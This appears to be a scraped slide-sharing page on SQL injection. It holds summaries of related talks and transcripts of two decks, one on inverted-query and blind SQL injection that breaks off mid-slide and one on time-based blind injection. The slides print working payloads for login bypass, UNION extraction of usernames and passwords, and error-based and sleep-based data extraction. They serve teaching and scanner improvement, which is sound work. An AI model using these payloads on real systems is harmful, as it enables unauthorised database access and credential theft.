This talk walks through the basics of web security without focussing too much on the particular tools that you choose. The concepts are universal, although most examples will be in Perl. We'll also look at various attack vectors (SQL Injection, XSS, CSRF, and more) and see how you can avoid them. Whether you're an experienced web developer (we all need reminding) or just starting out, this talk can help avoid being the next easy harvest of The Bad Guys.
Php & Web Security - PHPXperts 2009
The document discusses various web application security issues like SQL injection, input validation, cross-site scripting and provides recommendations to prevent these vulnerabilities when developing PHP applications. It emphasizes the importance of validating all user inputs, using prepared statements and output encoding to prevent code injection attacks and ensuring session security. The document also covers other attacks like cross-site request forgery and provides mitigation techniques.
8 sql injection
SQL injection attacks pose a major security threat by allowing attackers to alter intended database queries or commands through injection of malicious SQL code. Effective defenses include whitelisting input, escaping special characters, and using prepared statements with bind variables to separate data from SQL commands. These techniques help prevent attacks that could compromise user data, modify critical database information, or grant unauthorized access to attackers.
Application Security around OWASP Top 10
Caution: This is a dated presentation; uploaded for reference. While the principles remain valid, specifics may have changed.
This presentation was made for software developers in Chandigarh - as a part of the NULL & OWASP Chandigarh Chapter activities.
It covers the basics of secure software development and secure coding using OWASP Top 10 as a broad guide.
Web Application Security in Rails
This document summarizes common web application security vulnerabilities in Ruby on Rails such as SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), mass assignment, and CVE-2012-2661. It provides examples of these vulnerabilities and discusses countermeasures like input sanitization, access control, CSRF tokens, whitelisting attributes, and upgrading Rails versions. The document concludes by recommending following Rails security best practices and resources for learning about securing Rails applications.
Database security
The document discusses database input vulnerabilities like SQL injection and inference problems. It provides remedies like using parameterized queries and stored procedures to prevent SQL injection, and applying statistical inference controls to queries to prevent sensitive data from being inferred. The document covers topics like never connecting as a system admin, building SQL statements securely, and using quotation functions to avoid injection when dynamically building SQL.
How "·$% developers defeat the web vulnerability scanners
Share Favorite
Favorited X
Download More...
Favorited! Want to add tags? Have an opinion? Make a quick comment as well. Cancel
Edit your favorites Cancel
Send to your Group / Event Select Group / Event
Add your message Cancel
Post toBlogger WordPress Twitter Facebook Deliciousmore share options .Embed For WordPress.com
Without related presentations
0 commentsPost a comment
Post a comment
..
Embed Video Subscribe to follow-up comments Unsubscribe from followup comments .
Edit your comment Cancel .Notes on slide 1
no notes for slide #1
no notes for slide #1
..Favorites, Groups & Events
more
How "·$% developers defeat the web vulnerability scanners - Presentation Transcript
1.How ?¿$·& developers defeat the most famous web vulnerability scanners …or how to recognize old friends Chema Alonso Informática64 José Parada Microsoft Ibérica
2.Agenda
1.- Introduction
2.- Inverted Queries
3.- Arithmetic Blind SQL Injection
4.- Time-Based Blind SQL Injection using Heavey Queries
5.- Conclusions
3.1.-Introduction
4.SQL Injection is still here among us
5.Web Application Security Consortium: Comparision http://projects.webappsec.org/Web-Application-Security-Statistics 12.186 sites 97.554 bugs
6.Need to Improve Automatic Scanning
Not always a manual scanning is possible
Time
Confidentiality
Money, money, money…
Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools.
7.2.-Inverted Queries
8.
9.Homers, how are they?
Lazy
Bad trainined
Poor Experience in security stuff
Don´t like working
Don´t like computing
Don´t like coding
Don´t like you!
10.Flanders are Left-handed
11.Right
SELECT UID
FROM USERS
WHERE NAME=‘V_NAME’
AND
PASSWORD=‘V_PASSW’;
12.Wrong?
SELECT UID
FROM USERS
WHERE ‘V_NAME’=NAME AND
‘ V_PASSW’=PASSWORD
13.Login Inverted Query
Select uid
From users where ‘v_name’=name and ‘v_pass’=password
http://www.web.com/login.php?v_name=Robert&v_pass=Kubica’ or '1'='1
Select uid
From users where ‘Robert’=name and ‘Kubica’ or ‘1’=‘1’=password
FAIL
14.Login Inverted SQL Injection an example
Select uid
From users where ‘v_name’=name and ‘v_pass’=password
http://www.web.com/login.php?v_name=Robert&v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica
Select uid
From users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or ‘Kubica’=password
Success
15.Blind Attacks
Attacker injects code but can´t access directly to the data.
However this injection changes the behavior of the web application.
Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.
Blind SQL Injection
Biind Xpath Injection
Blind LDAP Injection
16.Blind SQL Injection Attacks
Attacker injects:
“ True where clauses”
“ False where clauses“
Ex:
Program.php?id=1 and 1=1
Program.php?id=1 and 1=2
Program doesn’t return any visible data from database or data in error messages.
The attacker can´t see any data extracted from the database.
17.Blind SQL Injection Attacks
Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”:
Different hashes
Different html structure
Different patterns (keywords)
Different linear ASCII sums
“ Different behavior”
By example: Response Time
18.Blind SQL Injection Attacks
If any difference exists, then:
Attacker can extract all information from database
How? Using “booleanization”
MySQL:
Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
“ True-Answer Page” or “False-Answer Page”?
MSSQL:
Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers)
Oracle:
Program.php?id=1 and 100>(Select ASCII(Sub
Similar to Time-Based Blind SQL Injection (20)
Web security with Eng Ahmed Galal and Eng Ramy saeid
Web security with Eng Ahmed Galal and Eng Ramy saeid
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scanners
Time-Based Blind SQL Injection
- 1. TIME-BASED BLIND SQL INJECTION Matt Presson (@matt_presson) Memphis ISSA November 2012
- 2. WHO AM I? Sr. Information Security Analyst Focus: Application Security Database Security Mobile Security
- 3. OBJECTIVE Quick introduction to SQL Injection Four main types of SQL Injection Time-based + Blind A likely scenario DEMOs
- 4. INTRO TO SQL INJECTION
- 5. DEFINITION “SQL injection is an attack in which malicious code is inserted into strings that are later passed to [a database] for parsing and execution.” “The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed.” Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
- 6. SAMPLE VULNERABLE CODE var _shipCity = Request.form("ShipCity"); var sql = "select * from OrdersTable" + " where ShipCity = " + "'" + _shipCity + "'"; Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
- 7. CATEGORIES OF SQL INJECTION Normal UNION queries Blind Boolean expressions Error-based Valid syntax that throws exceptions Time-based Resource intensive or sleep-style queries
- 8. EXAMPLES – NORMAL INJECTION var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '"+_shipCity+"'"; Inject: ' UNION <data you want to extract> -- - Example: select ShipCity, Dest from Orders where ShipCity='' UNION select Username, Password from Users -- -'
- 9. EXAMPLES – BLIND INJECTION var sql = "select * from Orders" + " where ShipCity = '"+_shipCity+"'"; Inject: <valid value>' and <positive expression> <valid value>' and <negative expression> Example: select * from Orders where ShipCity='Memphis' and '1'='1'
- 10. EXAMPLES – ERROR-BASED INJECTION var sql = "select * from Orders" + " where ShipCity = '"+_shipCity+"'"; Example (SQL Server): select * from Orders where ShipCity='' and 1=CAST(suser_name() as INT)-- -' Example (MySQL): select * from Orders where ShipCity='' and ExtractValue(0,CONCAT(0x5c,(select user())))-- -'
- 11. EXAMPLES – TIME-BASED INJECTION var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '"+_shipCity+"'"; Example (SQL Server): select ShipCity, Dest from Orders where ShipCity='' waitfor delay '0:0:10' Example (MySQL >= 5.0.12): select ShipCity, Dest from Orders where ShipCity='' UNION SELECT SLEEP(5), 2'
- 12. TIME-BASED + BLIND Same: Resource intensive or sleep/wait style functions New: Extract arbitrary data Bypass business functionality
- 13. EXAMPLES – TIME-BASED + BLIND var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '"+_shipCity+"'"; Example (SQL Server): select ShipCity, Dest from Orders where ShipCity=''; if(<boolean>) waitfor delay '0:0:10' Example (MySQL >= 5.0.12): select ShipCity, Dest from Orders where ShipCity='' UNION SELECT IF(<bool>,SLEEP(5),1), '2'
- 14. SCENARIO
- 15. DEMOS